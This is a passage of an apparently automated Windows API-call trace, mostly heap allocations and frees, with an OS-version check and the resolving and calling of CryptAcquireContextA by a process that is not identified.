(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.761] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0252.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.761] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0252.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0252.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0252.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0252.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.764] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.764] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0252.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.764] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.765] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.766] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.766] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0252.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0252.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0252.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0252.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.774] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0252.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0252.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.775] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3500 | out: hHeap=0x25c0000) returned 1 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.775] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 